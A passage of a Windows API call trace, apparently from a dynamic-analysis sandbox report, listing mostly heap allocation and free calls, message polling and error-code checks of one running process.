0x6 [0257.483] SetLastError (dwErrCode=0x6) [0257.483] WriteFile (in: hFile=0xfffffffe, lpBuffer=0xc04290, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x7de0c8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x7de0c8, lpOverlapped=0x0) returned 0 [0257.484] GetLastError () returned 0x6 [0257.484] GetLastError () returned 0x6 [0257.484] SetLastError (dwErrCode=0x6) [0257.484] GetLastError () returned 0x6 [0257.484] SetLastError (dwErrCode=0x6) [0257.484] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcdf350 | out: hHeap=0xbc0000) returned 1 [0257.484] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.484] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc052b0 | out: hHeap=0xbc0000) returned 1 [0257.484] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0257.484] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda678 | out: hHeap=0xbc0000) returned 1 [0257.484] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9af0 | out: hHeap=0xbc0000) returned 1 [0257.484] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe050 | out: hHeap=0xbc0000) returned 1 [0257.484] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0257.484] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01988 [0257.484] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018d8 [0257.484] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x18) returned 0xc2d2f8 [0257.484] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc2d2f8 | out: hHeap=0xbc0000) returned 1 [0257.484] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.484] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0257.484] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0257.484] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01988 [0257.484] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0257.484] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0257.484] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01988 [0257.484] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe050 [0257.484] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9af0 [0257.484] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018d8 [0257.485] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.485] QueryPerformanceCounter (in: lpPerformanceCount=0x7dfa28 | out: lpPerformanceCount=0x7dfa28*=18798038905) returned 1 [0257.485] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9af0 | out: hHeap=0xbc0000) returned 1 [0257.485] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe050 | out: hHeap=0xbc0000) returned 1 [0257.485] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0257.485] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0257.485] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe050 [0257.485] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9af0 [0257.485] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01988 [0257.485] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc018d8 [0257.485] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe190 [0257.485] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0257.485] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe190 | out: hHeap=0xbc0000) returned 1 [0257.485] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.485] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe190 [0257.485] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc018d8 [0257.485] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe078 [0257.485] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda678 [0257.485] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018c8 [0257.485] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.485] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xcd9dc0 [0257.485] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe1b8 [0257.485] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d48 [0257.485] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc018c8 [0257.485] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda600 [0257.485] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x40) returned 0xbfb0d8 [0257.485] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.485] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe1e0 [0257.485] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6a8 [0257.485] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b88 [0257.486] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bc8 [0257.486] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.486] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe208 [0257.486] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d78 [0257.486] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01928 [0257.486] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d90 [0257.486] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9da8 [0257.486] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.486] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9da8 | out: hHeap=0xbc0000) returned 1 [0257.486] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9da8 [0257.486] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.486] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe230 [0257.486] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.486] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01978 [0257.486] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda690 [0257.486] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ac0 [0257.486] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe258 [0257.486] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6c0 [0257.486] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01968 [0257.486] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6d8 [0257.486] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda618 [0257.486] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe280 [0257.486] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda648 [0257.486] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b68 [0257.486] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda660 [0257.486] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b20 [0257.486] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.486] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.486] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b78 [0257.487] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b78 | out: hHeap=0xbc0000) returned 1 [0257.487] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ac0 | out: hHeap=0xbc0000) returned 1 [0257.487] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b78 [0257.487] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.487] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ac0 [0257.487] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.487] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.487] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01938 [0257.487] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.487] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.487] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.487] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ac0 | out: hHeap=0xbc0000) returned 1 [0257.487] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.487] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b78 | out: hHeap=0xbc0000) returned 1 [0257.487] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xc3d5e0 [0257.487] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.487] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b78 [0257.487] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.487] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ac0 [0257.487] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.487] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.487] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda630 [0257.487] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.487] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.487] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d00 [0257.487] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.487] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.487] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b58 [0257.487] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.487] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b48 [0257.487] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01b38 [0257.487] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.488] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.488] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ac0 | out: hHeap=0xbc0000) returned 1 [0257.488] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda630 | out: hHeap=0xbc0000) returned 1 [0257.488] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d00 | out: hHeap=0xbc0000) returned 1 [0257.488] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.488] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b78 | out: hHeap=0xbc0000) returned 1 [0257.488] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.488] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b78 [0257.488] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01938 [0257.488] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b38 | out: hHeap=0xbc0000) returned 1 [0257.488] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b48 | out: hHeap=0xbc0000) returned 1 [0257.488] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.488] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b48 [0257.488] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b48 | out: hHeap=0xbc0000) returned 1 [0257.488] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda618 | out: hHeap=0xbc0000) returned 1 [0257.488] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b48 [0257.488] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b48 | out: hHeap=0xbc0000) returned 1 [0257.488] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xc3d620 [0257.488] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.488] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b48 [0257.488] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.488] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda618 [0257.488] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b38 [0257.488] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.488] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01b28 [0257.488] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b38 | out: hHeap=0xbc0000) returned 1 [0257.488] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.488] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b38 [0257.488] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b38 | out: hHeap=0xbc0000) returned 1 [0257.488] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b28 | out: hHeap=0xbc0000) returned 1 [0257.488] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.488] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda618 | out: hHeap=0xbc0000) returned 1 [0257.489] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.489] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.489] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b48 | out: hHeap=0xbc0000) returned 1 [0257.489] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.489] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda618 [0257.489] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b48 [0257.489] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b58 [0257.489] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d00 [0257.489] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda618 | out: hHeap=0xbc0000) returned 1 [0257.489] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b48 | out: hHeap=0xbc0000) returned 1 [0257.489] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.489] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.489] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b48 [0257.489] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.489] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.489] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b28 [0257.489] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b38 [0257.489] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01b18 [0257.489] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b28 | out: hHeap=0xbc0000) returned 1 [0257.489] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda618 [0257.489] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b28 [0257.489] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b28 | out: hHeap=0xbc0000) returned 1 [0257.489] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b18 | out: hHeap=0xbc0000) returned 1 [0257.489] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b38 | out: hHeap=0xbc0000) returned 1 [0257.489] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.489] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda618 | out: hHeap=0xbc0000) returned 1 [0257.489] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.490] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b48 | out: hHeap=0xbc0000) returned 1 [0257.490] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.490] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b78 | out: hHeap=0xbc0000) returned 1 [0257.490] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.490] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.490] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b78 [0257.490] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.490] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda618 [0257.490] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.490] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.490] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.490] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.490] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.490] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda618 | out: hHeap=0xbc0000) returned 1 [0257.490] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.490] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.490] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b78 | out: hHeap=0xbc0000) returned 1 [0257.490] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.490] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda618 [0257.490] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b78 [0257.490] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda618 | out: hHeap=0xbc0000) returned 1 [0257.490] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b78 | out: hHeap=0xbc0000) returned 1 [0257.490] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.490] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.490] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b78 [0257.490] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.490] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.490] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.491] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.491] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda618 [0257.491] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.491] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.491] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.491] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda618 | out: hHeap=0xbc0000) returned 1 [0257.491] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.491] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b78 | out: hHeap=0xbc0000) returned 1 [0257.491] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.491] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.491] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b78 [0257.491] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.491] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda618 [0257.491] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.491] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.491] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.491] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.491] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.491] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda618 | out: hHeap=0xbc0000) returned 1 [0257.491] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.491] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.491] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b78 | out: hHeap=0xbc0000) returned 1 [0257.491] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.491] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda618 [0257.491] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b78 [0257.491] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda618 | out: hHeap=0xbc0000) returned 1 [0257.491] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b78 | out: hHeap=0xbc0000) returned 1 [0257.491] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.491] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.491] RtlAllocateHeap 